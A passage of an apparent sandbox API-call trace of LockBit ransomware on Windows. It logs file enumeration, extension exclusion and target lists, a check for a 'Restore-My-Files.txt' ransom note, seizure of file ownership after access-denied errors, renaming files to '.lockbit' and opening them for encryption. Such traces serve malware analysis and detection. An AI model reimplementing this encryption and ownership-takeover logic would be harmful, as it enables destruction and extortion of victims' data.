hFile=0x3c0, lpBuffer=0x394007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 0x0 [0079.467] GetLastError () returned 0x3e5 [0079.467] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 1 [0079.467] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt") returned 78 [0079.467] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.467] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="TipBand.dll.mui", cAlternateFileName="")) returned 1 [0079.467] lstrcmpiW (lpString1=".", lpString2="TipBand.dll.mui") returned -1 [0079.467] lstrcmpiW (lpString1="..", lpString2="TipBand.dll.mui") returned -1 [0079.467] PathFindExtensionW (pszPath="TipBand.dll.mui") returned=".mui" [0079.467] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0079.467] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0079.468] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0079.468] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0079.468] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0079.468] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0079.468] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0079.468] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0079.468] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0079.468] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0079.468] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0079.468] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0079.468] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0079.468] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0079.468] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0079.468] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0079.468] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0079.468] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0079.468] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0079.468] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0079.468] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0079.468] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0079.468] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0079.468] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0079.469] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0079.469] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0079.469] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0079.469] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0079.469] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0079.469] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0079.469] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0079.469] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0079.469] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0079.469] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0079.469] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0079.469] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0079.469] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0079.469] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0079.469] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0079.469] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0079.469] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0079.469] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0079.469] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0079.469] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0079.469] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0079.469] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0079.469] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0079.470] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TipBand.dll.mui") returned -1 [0079.470] lstrcmpiW (lpString1="ntldr", lpString2="TipBand.dll.mui") returned -1 [0079.470] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TipBand.dll.mui") returned -1 [0079.470] lstrcmpiW (lpString1="bootsect.bak", lpString2="TipBand.dll.mui") returned -1 [0079.470] lstrcmpiW (lpString1="autorun.inf", lpString2="TipBand.dll.mui") returned -1 [0079.470] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\") returned="" [0079.470] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned=".mui" [0079.470] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0079.470] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0079.470] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0079.470] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0079.470] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0079.470] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0079.470] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0079.470] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0079.470] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0079.470] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0079.470] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0079.470] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0079.470] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0079.470] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0079.470] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0079.471] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0079.471] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0079.471] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0079.471] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0079.471] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0079.471] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0079.471] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0079.471] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0079.471] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0079.471] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0079.471] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0079.471] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0079.471] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0079.471] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui.lockbit") returned 81 [0079.471] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0079.471] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipband.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipband.dll.mui.lockbit")) returned 0 [0079.477] GetLastError () returned 0x5 [0079.477] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0079.477] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0079.477] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.477] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0079.478] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0079.478] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipband.dll.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3b0, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0079.479] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0079.479] NtQueryInformationFile (in: FileHandle=0x3b0, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0079.492] NtClose (Handle=0x3b0) returned 0x0 [0079.492] RtlFreeAnsiString (AnsiString="\\") [0079.492] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3b0) returned 1 [0079.492] malloc (_Size=0x200) returned 0x53fcc0 [0079.492] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0079.493] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.493] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.493] CloseHandle (hObject=0x3b0) returned 1 [0079.493] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0079.493] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0079.494] free (_Block=0x53fcc0) [0079.494] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0079.494] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipband.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipband.dll.mui.lockbit")) returned 1 [0079.495] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipband.dll.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0079.495] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0079.495] malloc (_Size=0x40068) returned 0x206b860 [0079.495] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=3072) returned 1 [0079.495] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0079.497] GetLastError () returned 0x3e5 [0079.497] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 1 [0079.497] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt") returned 78 [0079.497] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.498] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="TipRes.dll.mui", cAlternateFileName="")) returned 1 [0079.498] lstrcmpiW (lpString1=".", lpString2="TipRes.dll.mui") returned -1 [0079.498] lstrcmpiW (lpString1="..", lpString2="TipRes.dll.mui") returned -1 [0079.498] PathFindExtensionW (pszPath="TipRes.dll.mui") returned=".mui" [0079.498] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0079.498] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0079.498] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0079.498] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0079.498] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0079.498] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0079.498] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0079.498] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0079.498] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0079.498] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0079.498] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0079.498] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0079.498] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0079.498] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0079.498] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0079.498] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0079.499] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0079.499] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0079.499] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0079.499] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0079.499] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0079.499] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0079.499] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0079.499] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0079.499] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0079.499] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0079.499] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0079.499] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0079.499] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0079.499] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0079.499] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0079.499] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0079.499] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0079.499] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0079.499] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0079.499] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0079.499] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0079.499] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0079.500] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0079.500] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0079.500] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0079.500] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0079.500] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0079.500] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0079.500] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0079.500] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0079.500] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0079.500] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TipRes.dll.mui") returned -1 [0079.500] lstrcmpiW (lpString1="ntldr", lpString2="TipRes.dll.mui") returned -1 [0079.500] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TipRes.dll.mui") returned -1 [0079.500] lstrcmpiW (lpString1="bootsect.bak", lpString2="TipRes.dll.mui") returned -1 [0079.500] lstrcmpiW (lpString1="autorun.inf", lpString2="TipRes.dll.mui") returned -1 [0079.500] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\") returned="" [0079.500] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned=".mui" [0079.500] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0079.500] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0079.500] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0079.500] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0079.501] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0079.501] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0079.501] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0079.501] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0079.501] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0079.501] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0079.501] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0079.501] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0079.501] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0079.501] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0079.501] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0079.501] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0079.501] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0079.501] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0079.501] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0079.501] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0079.501] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0079.501] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0079.501] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0079.501] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0079.501] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0079.501] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0079.502] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0079.502] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0079.502] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui.lockbit") returned 80 [0079.502] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0079.502] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui.lockbit")) returned 0 [0079.502] GetLastError () returned 0x5 [0079.502] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0079.503] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0079.503] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.503] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0079.503] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0079.503] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3bc, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0079.504] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0079.504] NtQueryInformationFile (in: FileHandle=0x3bc, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0079.519] NtClose (Handle=0x3bc) returned 0x0 [0079.520] RtlFreeAnsiString (AnsiString="\\") [0079.520] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3bc) returned 1 [0079.520] malloc (_Size=0x200) returned 0x53fcc0 [0079.520] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0079.520] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.520] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.520] CloseHandle (hObject=0x3bc) returned 1 [0079.520] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0079.520] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0079.521] free (_Block=0x53fcc0) [0079.521] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0079.521] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui.lockbit")) returned 1 [0079.522] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0079.522] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0079.523] malloc (_Size=0x40068) returned 0x3940048 [0079.523] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3940060 | out: lpFileSize=0x3940060*=32768) returned 1 [0079.523] ReadFile (in: hFile=0x3bc, lpBuffer=0x394007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 0x0 [0079.525] GetLastError () returned 0x3e5 [0079.525] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 1 [0079.525] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt") returned 78 [0079.525] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.525] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5cd75ed, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe5f38bbd, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe5f38bbd, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", 